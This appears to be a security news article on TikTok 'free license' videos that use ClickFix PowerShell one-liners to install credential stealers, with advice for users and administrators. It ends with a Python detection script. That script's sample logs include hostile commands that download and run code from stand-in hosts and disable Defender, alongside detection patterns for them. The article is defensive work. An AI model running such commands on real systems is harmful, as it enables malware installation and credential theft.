Short, snappy TikTok clips are promising free Photoshop and Windows licenses, but the "fix" they provide is a trap. Scammers are using bite-sized how-to videos to walk viewers through a PowerShell one-liner that installs credential-stealing malware, security researchers say.
How the TikTok free license scam tricks victims
The latest: Investigators at the SANS Institute's Internet Storm Center have discovered a fresh round of TikTok videos that deliver malware wrapped in an easy solution: claim your free license, fix a glitch or speed up an app. The instructions are deceptively simple: start PowerShell as administrator, paste in a one-liner, press Enter. In one clip, viewed hundreds of times, including by The Times, that command launches a file named "Updater.exe." It was no license tool but AuroStealer, a credential thief, which went on to run further shellcode in memory to evade detection.
It's a textbook example of the social-engineering technique defenders call ClickFix. Instead of sending a suspicious attachment by email, adversaries trick users into "fixing" something by running the attacker's commands with the system's own tools. Because the victim initiates the action and nothing malicious ever lands in an inbox, email filtering and phishing defenses never see the lure.
Why TikTok is a bona fide delivery system
TikTok's format, quick, visual and algorithmically amplified, favors content that promises fast results. Trend Micro researchers observed networks of faceless accounts circulating near-identical "life hacks" whose steps end in PowerShell commands that fetch payloads associated with stealers such as Vidar and StealC. With the platform's reach, attackers can hit thousands of victims from a small infrastructure footprint, rotating accounts and videos to stay ahead of moderation.
ClickFix-style attacks have grown more prevalent and now account for a significant share of the initial compromises tracked by Microsoft's threat intelligence teams, the company said in its Digital Defense Report. The pattern is the same for consumers and enterprises: lure, instruct, execute, exfiltrate.
What the malware steals from your browser and apps
Information stealers are built for speed. Once running, families like AuroStealer search browsers for saved passwords, session cookies and autofill data, and commonly target password managers, cryptocurrency wallets and messaging tokens for Discord or Telegram. Some variants fetch additional payloads, such as remote access Trojans or ransomware, once credentials have been harvested. Stolen session cookies let criminals skip the login (and any multi-factor prompt) entirely, opening the door to account takeover and business email compromise. The F.B.I.'s Internet Crime Complaint Center has tracked multibillion-dollar annual losses linked to such downstream fraud.
Videos you should be skeptical of on TikTok
Be wary of any clip that tells you to run a one-liner in PowerShell or Command Prompt, especially when it insists on "Run as administrator." Other warning signs:
- Requests to turn off antivirus software, pause Windows’ built-in protections or allow an “updater” to be installed and executed
- References to “crack,” “activator,” “lifetime key” or “free license”
- Pinned comments or captions that include shortened links, file-sharing sites or instructions to copy code from paste sites
Watch in particular for "Invoke-Expression" (or its alias "iex") combined with "irm" (Invoke-RestMethod) or "iwr" (Invoke-WebRequest). The latter two download content from a URL; piping that into Invoke-Expression runs whatever the attacker's server returns, without a file ever being written to disk for a scanner to inspect. Pasted code from an untrusted source that contains these is a red flag.
How to protect yourself and your organization
Never run commands you don't fully understand, and don't trust licensing "hacks": they are illegal, unreliable and frequently weaponized. Obtain software only from authorized stores or vendors, and verify licenses on the developer's site or with its customer support. Trust your instincts, assume the worst of any such video, and take these measures:
- Use a password manager
- Enable multi-factor authentication on all available services
- Treat unusual login alerts seriously; if you suspect exposure, rotate passwords on affected accounts and revoke active sessions, since stolen cookies stay valid until you do
For administrators: enforce least privilege and put PowerShell into Constrained Language Mode for users who don't need full scripting. Enforce application control with Windows Defender Application Control or AppLocker, and enable Attack Surface Reduction rules that block untrusted or obfuscated script execution. Endpoint detection and response products should alert on script-based execution, in-memory payloads and credential access; PowerShell script block logging (Event ID 4104) gives them the actual command text, including what an encoded command decodes to. Network defenses can alert on traffic to known stealer command-and-control hosts, and DNS filtering can block the short-link and download domains the videos point to.
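The indicators described above (the iex/irm/iwr pattern from the list of videos to be skeptical of, and the script-based execution an EDR should flag) can be turned into triage logic. The following is an added example written for this page, not code from SANS, Trend Micro, Microsoft or any vendor product. It assumes the input is the ScriptBlockText of Event ID 4104 or the CommandLine of Event ID 4688; the sample entries, the `.invalid` domains, the indicator weights and the alert threshold are all constructed for illustration and should be tuned to your environment. The point it makes beyond the text: a plain search for "iex" misses a `-EncodedCommand` payload, so the script decodes the base64/UTF-16LE blob and scores what is inside it.

```python
"""Triage PowerShell command lines / script blocks for ClickFix-style indicators.

Added example for this page (not the article's or any vendor's code). Input is
Event 4104 ScriptBlockText or Event 4688 CommandLine; here replaced by
constructed sample strings so the script runs offline.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (name, regex, weight). Weights are assumptions for illustration; tune them.
INDICATORS = [
    ("remote-fetch",      r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b|\.Download(String|File)\(", 2),
    ("invoke-expression", r"\b(iex|Invoke-Expression)\b", 3),
    ("policy-bypass",     r"-(ExecutionPolicy|ep)\s+Bypass", 2),
    ("hidden-window",     r"-(WindowStyle|w)\s+Hidden", 2),
    ("base64-in-script",  r"FromBase64String", 2),
    ("temp-drop",         r"\$env:TEMP|AppData\\Local\\Temp", 1),
    ("defender-tamper",   r"Set-MpPreference\s+-Disable|Add-MpPreference\s+-ExclusionPath", 3),
]
ENCODED_WEIGHT = 3
ALERT_THRESHOLD = 4   # assumed: one weak indicator (e.g. a lone iwr) should not page anyone

# -EncodedCommand / -enc / -ec followed by a base64 blob (PowerShell encodes UTF-16LE).
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class Verdict:
    score: int = 0
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None   # first-layer plaintext behind -EncodedCommand, if any

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode the base64/UTF-16LE payload behind -EncodedCommand; None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(script: str) -> Verdict:
    """Score one command line or script block; an encoded payload is decoded and scored too."""
    verdict = Verdict()
    visible = script
    m = ENC_RE.search(script)
    if m:
        # Replace the blob so we score what it decodes to, not accidental substrings of base64.
        visible = script[:m.start(1)] + "<encoded>" + script[m.end(1):]
        verdict.hits.append("encoded-command")
        verdict.score += ENCODED_WEIGHT
        verdict.decoded = decode_encoded_command(m.group(1))
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, visible, re.IGNORECASE):
            verdict.hits.append(name)
            verdict.score += weight
    if verdict.decoded:
        inner = score_script_block(verdict.decoded)   # nested -enc layers unwrap recursively
        verdict.hits.extend(f"decoded:{h}" for h in inner.hits)
        verdict.score += inner.score
    return verdict


def triage(entries: List[str]) -> List[Verdict]:
    return [score_script_block(e) for e in entries]


# Constructed samples (not real telemetry). Domains use the reserved .invalid TLD.
STAGE2_PLAINTEXT = (r"iwr https://cdn.example.invalid/Updater.exe -OutFile $env:TEMP\Updater.exe; "
                    r"Start-Process $env:TEMP\Updater.exe")
STAGE2_B64 = base64.b64encode(STAGE2_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_LOGS = [
    r"Get-ChildItem -Path C:\Users\alice\Documents -Recurse | Measure-Object",            # benign
    'powershell -w hidden -ep bypass -c "irm https://updater.example.invalid/u.txt | iex"',  # ClickFix one-liner
    f"powershell -NoProfile -EncodedCommand {STAGE2_B64}",                                  # same intent, hidden
    r"Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath $env:TEMP",
    r"Invoke-WebRequest -Uri https://intranet.example.invalid/report.csv -OutFile C:\Reports\report.csv",  # legit admin use
]

if __name__ == "__main__":
    for entry, v in zip(SAMPLE_LOGS, triage(SAMPLE_LOGS)):
        flag = "ALERT" if v.alert else "ok   "
        print(f"{flag} score={v.score:<2} {', '.join(v.hits) or '-'}")
```

Run it and the second, third and fourth samples alert while the benign directory listing and the legitimate intranet download do not; the encoded sample is caught only because its payload was decoded and rescored, which is why script block logging (which records the decoded text) matters more than command-line auditing alone.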
What security researchers are seeing across platforms
Researchers at the SANS Internet Storm Center, Trend Micro and Microsoft's threat intelligence groups have each reported that short-form video platforms are being used for social engineering at scale. The adversaries iterate quickly: as videos are taken down, new accounts appear with scripts, voice-overs and captions that differ only in small details. The content looks helpful, the directions seem plausible and the payoff for attackers, fresh credentials and session tokens, is immediate.
The bottom line: if a TikTok video offers you a free Photoshop or Windows license, it isn't a favor, it's a funnel. Treat any "just run this command" advice as a stop sign, not a shortcut. Share the warning with friends and colleagues, because these videos activate nothing except the theft of your data.